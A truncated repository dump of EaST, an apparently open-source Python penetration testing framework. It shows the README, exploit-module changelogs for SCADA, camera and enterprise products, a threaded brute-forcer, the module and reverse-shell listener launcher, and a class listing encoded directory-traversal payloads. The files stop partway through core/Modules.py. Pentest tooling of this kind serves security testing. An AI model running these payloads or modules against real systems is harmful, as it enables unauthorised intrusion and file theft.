Showing preview only (725K chars total). Download the full file or copy to clipboard to get everything.
Repository: C0reL0ader/EaST
Branch: master
Commit: 4b1ab5333022
Files: 80
Total size: 694.9 KB
Directory structure:
gitextract_2b2nupye/
├── .gitignore
├── 3rdParty/
│ ├── ef_armo_pack_demo/
│ │ ├── LICENSE.txt
│ │ └── changelog.txt
│ ├── ef_scada_pack_demo/
│ │ ├── LICENSE.txt
│ │ └── changelog.txt
│ └── readme.txt
├── Documentation/
│ └── TD.docx
├── README.md
├── core/
│ ├── BruteForcer.py
│ ├── Commands.py
│ ├── DirectoryTraversal.py
│ ├── Modules.py
│ ├── OptionsParser.py
│ ├── PortScannerMT.py
│ ├── ReportGenerator.py
│ ├── ServiceMessagesHandler.py
│ ├── Sploit.py
│ ├── WebHelper.py
│ ├── WebSocketServer.py
│ ├── __init__.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── archieve/
│ │ │ ├── __init__.py
│ │ │ ├── jar.py
│ │ │ └── zip.py
│ │ └── java/
│ │ ├── Serialization.py
│ │ └── __init__.py
│ └── passwords.txt
├── data/
│ ├── CVE-2015-8103/
│ │ ├── serialized_class_loader
│ │ ├── serialized_file_writer
│ │ ├── serialized_jenkins_header
│ │ ├── serialized_payload_footer
│ │ └── serialized_payload_header
│ └── report_templates/
│ ├── common.html
│ └── row_template.html
├── docs/
│ ├── files/
│ │ ├── template.py
│ │ └── vulnserver_bof/
│ │ └── vulnserver_buffer_overflow.py
│ └── index.html
├── help/
│ └── README.txt
├── listener/
│ ├── __init__.py
│ ├── bind_connector.py
│ └── listener.py
├── shellcodes/
│ ├── Asm.py
│ ├── DotNetShellcode.py
│ ├── Encoders.py
│ ├── JavaShellcode.py
│ ├── PhpShellcode.py
│ ├── PythonShellcode.py
│ ├── README
│ ├── Runshellcode.py
│ ├── ShellUtils.py
│ ├── ShellcodeGenerator.py
│ ├── Shellcodes.py
│ ├── __init__.py
│ ├── data/
│ │ ├── java/
│ │ │ └── src/
│ │ │ └── ReverseTCP/
│ │ │ └── Payload.java
│ │ ├── linux/
│ │ │ ├── src/
│ │ │ │ ├── bind_tcp.asm
│ │ │ │ └── reverse_tcp.asm
│ │ │ └── x64/
│ │ │ └── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── windows/
│ │ ├── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── x64/
│ │ └── src/
│ │ ├── bind_tcp.asm
│ │ └── reverse_tcp.asm
│ ├── shellcode.py
│ └── shellcode_payload.py
├── start.py
└── ui/
├── __init__.py
├── css/
│ ├── codemirror.css
│ └── main.css
├── httpd.py
├── index.html
├── index.jade
├── js/
│ ├── codemirror.js
│ ├── components.js
│ ├── guiCommands.js
│ ├── main.js
│ ├── rsvp.js
│ ├── serverCommands.js
│ └── ws.js
└── mode/
└── python/
├── index.html
└── python.js
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.pyc
Reports/
Logs/
/.idea
/tmp/Webserver20160906100204
/OUTPUTS
/tmp
exploits
================================================
FILE: 3rdParty/ef_armo_pack_demo/LICENSE.txt
================================================
https://www.gnu.org/licenses/gpl-3.0.txt
================================================
FILE: 3rdParty/ef_armo_pack_demo/changelog.txt
================================================
1.0
September 18, 2022
efa_acunetix_sbo.py
efa_adobe_coldfusion_2018_rce.py
efa_apache_struts_rce.py
efa_apache_tomcat_fu_rce.py
efa_ATGCLabs_ActiveLN_HQLi.py
efa_ATGCLabs_Freezer_Web_Acceess_HQLi.py
efa_baidu_netdisk_dos.py
efa_cisco_catalyst_2960_pe.py
efa_cisco_license_manager_server_directory_traversal.py
efa_CleverMic_1011S_12_ip_camera_info_disclosure.py
efa_clinic_office5_db_management.py
efa_delta_mcis_upsentry2012_privilege_escalation.py
efa_dlink_dir8xx_pd.py
efa_drupal_coder_rce.py
efa_ebrigade_erp_4_5_esql.py
efa_ezviz_cs_cv210_ipcamera_management_or_dos.py
efa_ezviz_cs_cv210_ipcamera_snapshot.py
efa_honeywell_hed1pr3_ipcamera_info_disclosure.py
efa_iball_adsl2_router_rr.py
efa_IceHRM_info_disclosure.py
efa_inoerp_privilege_escalation.py
efa_kaspersky_anti_virus_file_server_fd.py
efa_kkmserver_2_1_26_16_dirtav.py
efa_kkmserver_2_1_26_16_dos.py
efa_levelone_wcs_2030_directory_traversal.py
efa_navigate_cms_8.2_ab_rce.py
efa_nelsonit_erp_6_3_1_esql.py
efa_netwave_ip_camera_information_disclosure.py
efa_openclinic_sqli.py
efa_oracle_java_se_xxe.py
efa_orient_ip33_sh14cp_snapshot.py
efa_Socomec_RemoteView_PRO_afu_rce.py
efa_sonicDICOM_privilege_escalation.py
efa_symantec_messaging_gateway_dt.py
efa_tp_link_tl_wa850re_rr.py
efa_trendmicro_control_manager_sqli_rce.py
efa_trendnet_tk_ip101_privilege_escalation.py
efa_trend_micro_control_manager_fu_rce.py
efa_trend_micro_threat_discovery_appliance_rce.py
efa_typesetter_cms_dir_listing.py
efa_uc_httpd_directory_traversal.py
efa_upsmon_pro_fd.py
efa_vstarcom_ip_camera_info_disclosure.py
efa_weberp_sqli.py
efa_wordpress_events_sqli.py
efa_xnat_info_disclosure.py
efa_zabbix_sqli.py
efs_domoticz_4_9700_bof.py
efs_domoticz_4_9700_sqli.py
ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py
================================================
FILE: 3rdParty/ef_scada_pack_demo/LICENSE.txt
================================================
https://www.gnu.org/licenses/gpl-3.0.txt
================================================
FILE: 3rdParty/ef_scada_pack_demo/changelog.txt
================================================
1.0
September 18, 2022
efa_delta_mcis_upsentry2012_info_disclosure.py
efa_open_source_erp_arbitrary_sql_execution.py
efa_open_source_erp_dir_trav.py
efs_advantech_webaccess_8_3_2_dashboardconfig_afd.py
efs_advantech_webaccess_8_3_2_dashboard_bsqli.py
efs_advantech_webaccess_8_3_directory_traversal.py
efs_advantech_webaccess_8_3_file_delete.py
efs_advantech_webaccess_dashboardeditor_afd.py
efs_atvise_3_2_afd.py
efs_atvise_3_2_info_disclosure.py
efs_autobase_netserver_dos.py
efs_Becknoff_CX9020_Reboot.py
efs_cogent_datahub_7_3_x_dos.py
efs_delta_DIAEnergie_info_disclosure.py
efs_DELTA_IA_Robot_DRAstudio_afd.py
efs_DoMore_Designer_afd.py
efs_eisbaer_scada_directory_traversal2.py
efs_eisbaer_scada_dt.py
efs_Elipse_E3_e3server_remote_stop.py
efs_esa_automation_crew_webserver_dir_trav.py
efs_GP_PRO_EX_WinGP_Runtime_afd.py
efs_indigo_scada_information_disclosure.py
efs_inductive_automation_7_6_4_designer_xxe.py
efs_inductive_automation_ignition_7_5_4_bSQLi.py
efs_inductive_automation_ignition_7_5_4_xxe.py
efs_infrasightlabs_vscopeserver_privilege_escalation.py
efs_IPESOFT_D2000_SCADA_DirTrav.py
efs_kingscada_aeserver_dos.py
efs_laquis_scada_directory_traversal.py
efs_logi_cals_logi_RTS_dir_trav.py
efs_logi_cals_logi_RTS_RTShttpd_DoS.py
efs_loytec_lweb900_server_dir_trav.py
efs_lsis_wXP_DoS.py
efs_lsis_XP_Manager_DoS.py
efs_moxa_mxview_dos.py
efs_OpenAPC_BeamServer_DoS.py
efs_OSHMI_remote_shutdown.py
efs_PASvisu_dos.py
efs_PeakHMI_Webserver_DirTrav.py
efs_promotic_scada_dos.py
efs_quickhmi_directory_traversal.py
efs_rcware_dos.py
efs_reliance_scada_directory_traversal.py
efs_s3scada_remote_stop.py
efs_SpiderControl_SCADA_Editor_DirTrav.py
efs_trihedral_vtscada_dos.py
efs_u_motion_builder_hardcoded_credentials.py
efs_vbase_vokserver_info_disclosure.py
efs_winplc7_webserver_arbitrary_file_disclosure.py
efs_wintr_scada_hardcoded_credentials_directory_traversal.py
================================================
FILE: 3rdParty/readme.txt
================================================
Add packs here. The license for 3rd party's should be the same as for East.
You should put exploits to directory "your_pack_name/exploits/"
================================================
FILE: README.md
================================================
# «EAST» – «Exploits And Security Tools» penetration testing framework.
## 1. Overview
Pentest framework environment is the basis of IT security specialist’s toolkit.
This software is essential as for learning and improving of knowledge in IT systems attacks and for inspections and proactive protection.
The need of native comprehensive open source pen test framework with high level of trust existed for a long time. That is why EAST framework was created for native and native friendly IT security markets.
EAST is a framework that has all necessary resources for wide range exploits to run, starting from Web to buffer overruns.
EAST differs from similar toolkits by its ease of use. Even a beginner can handle it and start to advance in IT security.
Main features:
* Framework security.
Software used for IT security must have a high level of user trust. Easy to check open source Python code realized in EAST. It is used for all parts of the framework and modules. Relative little amount of code eases its verification by any user. No OS changes applied during software installation.
* Framework maximum simplicity.
Archive downloads, main python script start.py launches, which allows exploits start-stop and message traffic. All handled local or remotely via browser.
* Exploits simplicity of creation and editing.
Possibility to edit and add modules and exploits on the fly without restart. Module code body is easy and minimal in terms of amount.
* Cross-platform + minimal requirements and dependencies.
Tests for Windows and Linux. Should function everywhere where Python is installed. Framework contains all dependencies and does not download additional libraries.
* Full capacity of vanilla pen test framework.
In spite of simplicity and “unoverload” the framework has all necessary resources for wide range exploits to run, starting from Web to buffer overruns.
* Wide enhancement possibilities.
Third party developers can create their own open source solutions or participate in EAST development by use of Server-client architecture, message traffic API and support libraries.
## 2. Requirements
* [Python 2](https://www.python.org/downloads/)
## 3. Usage
git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py [-p PORT] [--all-interfaces]
## 4. Additional resources
* Exploits and Security Tools Framework [website](http://eastfw.com/).
* [EaST Exploits DB](http://eastexploits.com/)
* [EaST exploits developer guide](https://github.com/C0reL0ader/EaST/wiki)
* [Twitter](https://twitter.com/EAST_framework)
================================================
FILE: core/BruteForcer.py
================================================
#!/usr/bin/python
import sys
import os.path
from threading import RLock, Thread
RESOURCE_DIR = "./"
class BruteForcer:
"""
Class includes a generic threaded brute forcer logic
"""
def __init__(self):
self.maxthreads = 5
self.wordlist = os.path.join(RESOURCE_DIR, "passwords.txt")
self.wordlist_lock = RLock()
self.successful_guess = None # the word that won
return
@staticmethod
def log(host=None, message=""):
"""
Logger
"""
if not host:
host = "127.0.0.1" # FIXME
message = "(%s) %s" % (host, message)
sys.stdout.write("[*] " + str(message) + "\n")
def get_next_word(self):
"""
Get the next word in wordlist, we lock since readline may not be atomic.
This code could go into some sort of auxiliary object that is more abstract later.
It returns False when it is out of words.
"""
#if a thread found one, it will set successful_guess
if self.successful_guess:
#so we pretend we are done.
return False
self.wordlist_lock.acquire()
try:
next_word = self.wordlistfd.readline().strip()
except EOFError:
self.wordlist_lock.release()
return False
self.wordlist_lock.release()
return next_word
def brute_loop(self):
"""
Override this with your connect/check loop.
Don't forget to check for self.HALT!
"""
self.log("Stub brute_loop called")
return
def run(self):
if self.wordlist:
self.wordlistfd = file(self.wordlist, "r")
mythreads = []
if self.maxthreads <= 0:
self.log("Invalid maxthreads value recieved: %d" % self.maxthreads)
return 0
self.log("Starting %d threads to brute force with" % self.maxthreads)
for i in xrange(0, self.maxthreads):
"""
Start up a new thread for each run. These will call get_next_word as applicable.
"""
t = Thread(target=self.brute_loop())
t.setDaemon(True)
t.start()
mythreads += [t]
for a_thread in mythreads:
a_thread.join()
self.log("Thread finished")
if self.successful_guess:
self.log("Found successful word: %s" % self.successful_guess)
return 1
self.log("Exhausted brute force attempts - did not find successful word")
return 0
================================================
FILE: core/Commands.py
================================================
# coding=utf-8
import os
import subprocess
import sys
import json
import logging
import inspect
import Modules
import PortScannerMT
from Modules import ModulesHandler
from OptionsParser import OptionsParser
from ReportGenerator import ReportGenerator
from ServiceMessagesHandler import ServiceMessagesHandler
from uuid import uuid4
FW_ROOT_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
EXPLOITS_PATH = os.path.join(FW_ROOT_PATH, 'exploits')
LISTENER_PATH = os.path.join(FW_ROOT_PATH, 'listener', 'listener.py')
PACKS_PATH = os.path.join(FW_ROOT_PATH, '3rdParty')
class APIClient:
def __init__(self, wsclient):
self.wsclient = wsclient
def check_coding(self, kwargs):
for key, value in kwargs.items():
if type(value) is unicode:
value = value.encode('utf-8')
if type(value) is str:
try:
value.decode('utf-8')
except UnicodeDecodeError:
value = value.decode('utf-8', 'replace')
kwargs[key] = value
def hello(self, module_name, type):
args = json.dumps(dict(hello=dict(name=module_name, type=type), uuid=str(uuid4())))
self.wsclient.send(args)
self.wsclient.recv()
def send_command(self, command, **kwargs):
cmd = dict(command=command, args=kwargs, uuid=str(uuid4()))
try:
req = json.dumps(cmd)
except UnicodeDecodeError:
self.check_coding(kwargs)
req = json.dumps(cmd)
self.wsclient.send(req)
res = self.wsclient.recv()
res = json.loads(res)
return res['args']
class API:
def callable(foo):
def api_wrapped(self, *args, **kwargs):
return foo(self, *args, **kwargs)
setattr(api_wrapped, '__wrapped__', foo)
return api_wrapped
callable = staticmethod(callable)
def __init__(self):
pass
class Commands(API):
def __init__(self, server):
API.__init__(self)
self.commands = self.get_api_functions()
self.server = server
self.available_modules = self.get_all_modules_paths()
self.modules_handler = ModulesHandler(self)
self.logger = logging.getLogger()
self.options_parser = OptionsParser()
self.port_scanner = PortScannerMT.Scanner(4000, 5000)
self.report_generator = ReportGenerator()
self.service_messages_handler = ServiceMessagesHandler()
def get_api_functions(self):
"""
Find all api_wrapped methods in class Commands
Returns (dict): method name => method
"""
api_methods = {k: v for k, v in vars(self.__class__).items() if
inspect.isfunction(v) and v.__name__ == 'api_wrapped'}
return api_methods
def get_all_modules_paths(self):
"""Get common modules and modules from packs if available"""
exploits = Modules.get_modules_names_dict(EXPLOITS_PATH)
if not os.path.exists(PACKS_PATH):
os.makedirs(PACKS_PATH)
files = os.listdir(PACKS_PATH)
for f in files:
path_to_pack = os.path.join(PACKS_PATH, f)
if os.path.isdir(path_to_pack):
pack_dirs = [fname.lower() for fname in os.listdir(path_to_pack)]
if "exploits" in pack_dirs:
full_path_to_pack_exploits = os.path.join(path_to_pack, 'exploits')
exploits.update(Modules.get_modules_names_dict(full_path_to_pack_exploits))
return exploits
def _get_wrapped_function_required_args(self, func):
if not hasattr(func, '__wrapped__'):
return None
args_spec = inspect.getargspec(func.__wrapped__)
# Now slice 2 first arguments(self, client) and kw_args
required_args = args_spec.args[2: - len(args_spec.defaults or [])]
return args_spec.args, required_args
def execute(self, message, client):
"""
Execution of command from websocket-client
@param message:(Dict) Object, containing keys "command" and "args"
@param client:(WebSocketHandler) Websocket client handler. Used to send response from server to this client
"""
if not message or type(message) is not dict or "command" not in message or "args" not in message:
self.send_error(client, 'Error while handling request')
return
command = message["command"]
args = message["args"]
uuid = message.get('uuid')
args = args if args else {}
if command not in self.commands:
self.send_error(client, 'Wrong command')
return
func = self.commands[command]
func_args, func_req_args = self._get_wrapped_function_required_args(func)
# find missing or excess args
func_args_set = set(func_args)
func_req_args_set = set(func_req_args)
input_args_set = set(args)
intersection = func_req_args_set.intersection(input_args_set)
# missing
if len(intersection) != len(func_req_args_set):
diff = func_req_args_set.difference(input_args_set)
msg = 'Following required parameters are missing: %s' % ', '.join(diff)
print(command, 'Error: %s' % msg)
self.send_error(client, msg)
return
diff = input_args_set.difference(func_args_set)
if diff:
msg = 'Following parameters are excess: %s' % ', '.join(diff)
print(command, 'Error: %s' % msg)
self.send_error(client, msg)
return
# if no errors call func
resp = func(self, client, **args)
if uuid:
client.send_message(dict(command='on_callback', args=resp, uuid=uuid))
@API.callable
def start_module(self, client, module_name, use_listener, use_custom_port=False, custom_port=0, listener_type=1, options={}):
"""
Runs a module
Args:
module_name: (string) Name of module
use_listener: (bool) If True - enable listener for module
use_custom_port: (bool) Use custom listener port
custom_port: (int) Custom listener port
listener_type: (int) 1 - reverse, 2 - bind
options: (dict) Option of module set up in GUI
Returns:
(dict):
'module_name': (string) Unique name of running module
'listener': (bool) Is listener enabled
"""
if module_name not in self.available_modules:
print('There is no module with name %s' % module_name)
return
module_path = self.available_modules[module_name]
new_module_name = self.modules_handler.make_unique_name(module_name)
options = self.options_parser.parse_data(options)
running_module = self.modules_handler.register_process(new_module_name, module_name, options)
if use_listener and listener_type == 1:
exclude_ports = self.modules_handler.get_busy_ports_list()
if use_custom_port and custom_port:
if custom_port in exclude_ports or self.port_scanner.check_port_state(custom_port):
message = 'Lister port %d is busy. Try another port for listener' % custom_port
return self.make_error(message)
listener_options = dict(PORT=custom_port)
else:
free_socket_data = self.port_scanner.scan(search_for='closed', first_match=True, nthreads=10,
exclude=exclude_ports)
listener_options = dict(PORT=free_socket_data[0][1])
running_module.listener_options = listener_options
listener_process = subprocess.Popen([sys.executable, LISTENER_PATH, new_module_name], shell=False, env=os.environ.copy())
self.modules_handler.add_listener_pid(new_module_name, listener_process.pid)
process = subprocess.Popen([sys.executable, module_path, new_module_name], shell=False, env=os.environ.copy())
self.modules_handler.add_module_pid(new_module_name, process.pid)
return dict(module_name=new_module_name, listener=use_listener)
@API.callable
def install_via_pip(self, client, library_name):
"""
Install python module via pip
Args:
library_name: Name of module to install
"""
import subprocess
try:
proc = subprocess.Popen(['pip', 'install', library_name])
except Exception as e:
print e
return self.make_error('Can\'t install module %s' % library_name)
else:
proc.communicate()
if proc.returncode == 0:
self.service_messages_handler.remove_import_error(library_name)
return dict(module_to_import=library_name)
return self.make_error('Can\'t install module %s' % library_name)
@API.callable
def get_all_server_data(self, client):
"""
Returns dict of modules, version, service messages
"""
data = []
self.service_messages_handler.reset()
for name in self.available_modules:
data.append([self.available_modules[name], name])
available_modules = self.modules_handler.get_modules_info(data)
service_messages = self.service_messages_handler.get_grouped()
# Get framework version
module = self.modules_handler.import_from_uri("start.py", False)
version = "?"
if module and hasattr(module, "VERSION"):
version = module.VERSION
return dict(modules=available_modules, version=version, serviceMessages=service_messages)
@API.callable
def get_modules_log(self, client):
"""
Get all modules and listeners log
"""
modules = self.modules_handler.get_full_log()
return modules
@API.callable
def kill_process(self, client, module_name):
"""
Kills running processes of module and listener if exists
Args:
module_name: (string) Name of module
"""
if module_name not in self.modules_handler.running_modules:
return
self.modules_handler.kill_process(module_name)
@API.callable
def register_module_message(self, client, message, state, module_name, type='text', inline=False, replace=False):
"""
Add log message from module
Args:
message: (string) Message from module
state: (bool or None) State of module(success, fail or nothing)
module_name: (string) Name og running module
type: (string) text or image
inline: (bool) Write on last line if True
replace: (bool) Replace last line if True
"""
module = self.modules_handler.add_message(module_name, message, state, inline, replace, type)
message = {"command": "on_module_message",
"args": {
"module_name": module.module_name,
"message": module.log[-1].formatted(),
"state": state
}}
# TODO REPORTS
# if state is not None:
# self.generate_report(pid)
self.send_message_to_ui(message)
return dict(message="ok")
@API.callable
def get_module_options(self, client, module_name):
"""
Send options of module to gui
Args:
module_name: real module name without '.py' extension
Returns:
(list) List of options from module's dict OPTIONS
"""
if module_name in self.available_modules:
opts = self.modules_handler.get_available_options_for_module(self.available_modules[module_name])
opts = self.options_parser.prepare_options(opts)
json_resp = []
for key in opts:
json_resp.append(dict(option=key, value=opts[key]))
return json_resp
@API.callable
def get_module_args(self, client, module_name):
"""
Get module options changed by GUI
Args:
module_name: (string) Name of running module
Returns:
(dict) Dict of options
"""
resp = self.modules_handler.get_changed_options(module_name)
return resp
@API.callable
def gui_command_to_listener(self, client, module_name, message):
"""
Sends command from GUI to listener
Args:
module_name: (string) Name of running module
message: (string) Message for listener from gui(os command)
"""
self.modules_handler.add_listener_message(module_name, ">> " + message)
args = dict(module_name=module_name, message=message)
self.send_message_to_listener(module_name, args)
@API.callable
def on_listener_message(self, client, module_name, message, state):
"""
Add message from listener to gui or get last command from gui to listener
Args:
module_name: (string) Name of running module
message: (string) Message from listener
state: (int) 0 - shell is not connected
1 - shell connected
2 - shell disconnected
"""
self.modules_handler.add_listener_message(module_name, message, state)
data = dict(command="on_listener_message", args=dict(module_name=module_name, state=state, message=message))
self.send_message_to_ui(data)
@API.callable
def get_listener_options(self, client, module_name):
"""
Get listener options by listener PID or module PID
Args:
module_name: (string) Name of running module
"""
if not module_name:
return self.make_error('PIDs are not specified')
options = self.modules_handler.get_module_inst_by_name(module_name).listener_options
return options
@API.callable
def add_listener_options(self, client, module_name, options):
"""
Adds/Changes options of listener
Args:
module_name: (string) Name of running module
options: (dict) listener options
"""
module = self.modules_handler.get_module_inst_by_name(module_name)
module.listener_options = options
return {"re"}
@API.callable
def add_listener_pid(self, client, module_name, pid):
"""
Adds listener PID to running module instance
Args:
module_name: (string) Name of running module
pid: (int) Listener PID
"""
self.modules_handler.add_listener_pid(module_name, pid)
@API.callable
def get_source(self, client, module_name):
"""
Get source code of module
Args:
module_name: (string) real module name, without '.py' extension
"""
with open(self.available_modules[module_name]) as f:
lines = f.read().splitlines()
source = "\n".join(lines)
return dict(message=source, module_name=module_name)
@API.callable
def save_source(self, client, module_name, message):
"""
Save edited source code of module
Args:
module_name: (string) real module name, without '.py' extension
message: (string) Edited source code of module
"""
host, port = client.socket.getsockname()
if "localhost" not in host and "127.0.0.1" not in host:
message = "Only localhost user can save sources"
self.send_error(client, message)
return
code = message.encode('utf-8')
with open(self.available_modules[module_name], 'wb') as f:
f.write(code)
self.send_info(client, 'Module %s successfully changed' % module_name)
@API.callable
def is_listener_connected(self, client, module_name):
"""
Get info about state of listener
Args:
module_name: (string) Name of running module
"""
state = None
module = self.modules_handler.get_module_inst_by_name(module_name)
if module:
state = module.is_shell_connected
if state == 0:
state = False
elif state == 1:
state = True
resp = dict(state=state)
return resp
def make_error(self, error_msg):
return dict(error=True, message=error_msg)
def send_error(self, client, error_msg):
client.send_message(dict(command='on_error', args=dict(message=error_msg)))
def send_info(self, client, info_msg):
client.send_message(dict(command='on_info', args=dict(message=info_msg)))
def generate_report(self, module_name):
module_inst = self.modules_handler.get_module_inst_by_name(module_name)
info = self.modules_handler.get_module_info((self.available_modules[module_inst.original_name], module_name))
module_vars = {
"LOG": module_inst.log,
"RESULT": module_inst.state,
"OPTIONS": module_inst.options
}
listener_vars = {
"IS_SHELL_CONNECTED": module_inst.is_shell_connected,
"LISTENER_OPTIONS": module_inst.listener_options,
"LISTENER_LOG": '\n'.join(module_inst.listener_messages)
}
module_vars.update(info)
module_vars.update(listener_vars)
module_vars["CVE"] = module_vars["CVE Name"]
self.report_generator.append_module(module_vars)
def send_message_to_ui(self, message):
self.server.send_message_to_all_uis(message)
def send_message_to_listener(self, module_name, message):
self.server.send_message_to_listener(module_name, message)
================================================
FILE: core/DirectoryTraversal.py
================================================
# simple class for directory traversal vulnerbility
class DirTrav:
def __init__(self):
self.xpath = []
self.xpath.append("../")
self.xpath.append("..\\")
self.xpath.append("....//")
self.xpath.append("..../")
self.xpath.append(".../")
self.xpath.append("....\\\\")
self.xpath.append("...\\\\")
self.xpath.append("./")
self.xpath.append("%80../")
self.xpath.append("%80..\\")
self.xpath.append("%%32%65")
self.xpath.append("%2%65%2%65%2%66")
#----------LowerCase start
self.xpath.append("%5c../")
self.xpath.append("..%5c/")
self.xpath.append("..%5c")
self.xpath.append("%2e%2e%2f")
self.xpath.append("%2e%2e/")
self.xpath.append("%2e%2e\\")
self.xpath.append("..%2f")
self.xpath.append("%2e%2e%5c")
self.xpath.append("%252e%252e%255c")
self.xpath.append("%252e%252e%252f")
self.xpath.append("..%255c")
self.xpath.append("..%c1%1c")
self.xpath.append("..%c0%af")
self.xpath.append("%%32e%%32e%%32f")
self.xpath.append("%u002e%u002e%u002f")
#----------LowerCase end
#----------UpeerCase start
self.xpath.append("%5C../")
self.xpath.append("..%5C/")
self.xpath.append("..%5C")
self.xpath.append("%2E%2E%2F")
self.xpath.append("%2E%2E/")
self.xpath.append("%2E%2E\\")
self.xpath.append("..%2F")
self.xpath.append("%2E%2E%5C")
self.xpath.append("%252E%252E%255C")
self.xpath.append("%252E%252E%252F")
self.xpath.append("..%255C")
self.xpath.append("..%C1%1C")
self.xpath.append("..%C0%AF")
self.xpath.append("%%32E%%32E%%32F")
self.xpath.append("%U002E%U002E%U002F")
#----------UpperCase end
def make_path(self, path, file_name, count):
a = ""
for i in xrange(0, count):
a = a + path
return a + file_name
================================================
FILE: core/Modules.py
================================================
import datetime
import sys
import os
import imp
import logging
import traceback
from modulefinder import ModuleFinder
class ModuleMessageElement:
def __init__(self, message, type="text"):
self.time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.message = message
self.type = type
def formatted(self):
return {
"time": self.time,
"message": self.message,
"type": self.type
}
class RunningModule:
def __init__(self, module_name, options, pid=None, listener_pid=None, listener_options=None):
self.module_name = module_name
self.original_name = ""
self.pid = pid # pid of running module
self.options = options
self.log = [] # Log messages
self.state = None # None - module is run, True - succeeded, False - failed
self.listener_options = listener_options if listener_options else {}
self.listener_pid = listener_pid
self.is_shell_connected = 0
self.listener_messages = []
class ModulesHandler:
def __init__(self, commands_handler):
self.commands_handler = commands_handler
self.server = commands_handler.server
self.running_modules = {}
# Options of every module
self.modules_options = {}
self.logger = logging.getLogger(__name__)
self.logger.info("Initializing modules handler")
def add_module_pid(self, module_name, pid):
module = self.running_modules.get(module_name)
if module:
self.server.add_process(pid)
module.pid = pid
def add_listener_pid(self, module_name, pid):
module = self.running_modules.get(module_name)
if module:
self.server.add_process(pid)
module.listener_pid = pid
def add_message(self, module_name, new_message, state=None, inline=False, replace=False, type='text'):
if module_name in self.running_modules:
if inline:
current_message = self.running_modules[module_name].log[-1].message
self.running_modules[module_name].log[-1].message = current_message + new_message
else:
self.running_modules[module_name].log.append(ModuleMessageElement(new_message, type))
if replace:
self.running_modules[module_name].log[-1].message = new_message
if state is not None:
self.running_modules[module_name].state = state
return self.running_modules[module_name]
def add_listener_message(self, module_name, message, state=None):
if module_name in self.running_modules:
module = self.running_modules[module_name]
module.listener_messages.append(message)
if state:
module.is_shell_connected = state
if state == 2:
self.server.remove_process(module.listener_pid)
def register_process(self, module_name, original_name, options):
""" Register new running module as process
@param module_name: Module name
@param process: subprocess.Popen() instance
"""
new_process = RunningModule(module_name, options)
new_process.original_name = original_name
self.running_modules[module_name] = new_process
return new_process
def kill_process(self, module_name):
""" Kill process and remove it from list of running modules
:param pid: PID of running process
"""
if module_name not in self.running_modules:
return
module = self.running_modules[module_name]
self.server.remove_process(module.pid)
self.server.remove_process(module.listener_pid)
del self.running_modules[module_name]
def get_full_log(self):
log = {}
for module_name in self.running_modules:
message_elements = self.running_modules[module_name].log
temp_messages = []
for element in message_elements:
temp_messages.append(element.formatted())
log[module_name] = dict(
state=self.running_modules[module_name].state,
message=temp_messages,
listener=self.running_modules[module_name].listener_messages
)
return log
def get_module_log(self, module_name):
if module_name not in self.running_modules:
return None
module = self.running_modules[module_name]
message_elements = module.log
temp_messages = []
for element in message_elements:
temp_messages.append(element.formatted())
log = dict(
state=self.running_modules[module_name].state,
message="\n".join(temp_messages),
new_messages=self.running_modules[module_name].new_messages
)
self.running_modules[module_name].new_messages = False
return log
def import_from_uri(self, uri, absl=True):
"""Import module by given path
:param uri: (string) Path to module
:param absl: (bool) Is path absolute
:return: python module instance
"""
if not absl:
uri = os.path.normpath(os.path.join(os.path.dirname(__file__), "../" + uri))
path, fname = os.path.split(uri)
mname, ext = os.path.splitext(fname)
no_ext = os.path.join(path, mname)
if os.path.exists(no_ext + '.py'):
try:
return imp.load_source(mname, no_ext + '.py')
except ImportError as e:
finder = ModuleFinder()
finder.run_script(no_ext + '.py')
bad_imports = map(lambda mod_tup: mod_tup[0],
filter(lambda x: x[1].get('__main__'), finder.badmodules.items()))
for mn in bad_imports:
self.commands_handler.service_messages_handler.add_message(e.message,
module_with_unknown_import=mname,
module_to_import=mn)
print 'Error: module %s requires %s' % (mname, ', '.join(bad_imports))
except:
res = []
exc_type, exc_value, exc_traceback = sys.exc_info()
formatted_lines = traceback.format_exc().split('\n')
res.append(formatted_lines[0])
res.extend(formatted_lines[3:])
msg = '\r\n'.join(res)
print(msg)
def get_modules_info(self, names):
"""Gets info about given modules
:param names: (List of strings) Paths to modules
:return: (Dict)Key=>Path to module, Value=>'INFO' dict of imported module
"""
res = []
for name in names:
info = self.get_module_info(name)
if info:
res.append(info)
res = make_tree(res)
return res
def get_module_info(self, name):
module = self.import_from_uri(name[0])
if hasattr(module, 'INFO'):
if type(module.INFO.get('LINKS')) is not list:
module.INFO['LINKS'] = [module.INFO.get('LINKS', '')]
module.INFO["NAME"] = name[1]
return module.INFO
return None
def get_changed_options(self, module_name):
options = self.running_modules[module_name].options
options['listener'] = self.running_modules[module_name].listener_options
return options
def get_available_options_for_module(self, module_name):
module = self.import_from_uri(module_name)
if hasattr(module, 'OPTIONS'):
return module.OPTIONS
else:
return {}
def get_module_inst_by_name(self, module_name):
return self.running_modules.get(module_name)
def make_unique_name(self, module_name, suffix=1):
if module_name not in self.running_modules:
return module_name
name = "%s(%s)" % (module_name, suffix)
if name in self.running_modules:
suffix += 1
return self.make_unique_name(module_name, suffix)
else:
return name
def get_busy_ports_list(self):
"""Gets ports with status 2"""
res = [int(module.listener_options.get("PORT"))
for module_name, module
in self.running_modules.iteritems()
if module.is_shell_connected != 2 and module.listener_options.get("PORT")]
return res
def get_modules_names_dict(path_to_files):
"""Get list of .py files names in directory"""
files = os.listdir(path_to_files)
res = {}
for filename in files:
if filename.endswith(".py"):
res[filename[:-3]] = os.path.join(path_to_files, filename)
return res
def _attach(branch, module, trunk):
"""
Insert a branch of directories on its trunk.
"""
parts = branch.split('/', 1)
if len(parts) == 1: # branch is a file
module["isFile"] = True
trunk.append(module)
else:
node, others = parts
node = node.capitalize()
node_obj = dict(NAME=node, DESCRIPTION=node, isFile=False)
res, index = is_module_in_trunk(trunk, node)
if res:
_attach(others, module, trunk[index]["children"])
else:
node_obj["children"] = []
trunk.append(node_obj)
_attach(others, module, node_obj["children"])
def make_tree(modules):
main_dict = []
for module in modules:
if "PATH" in module:
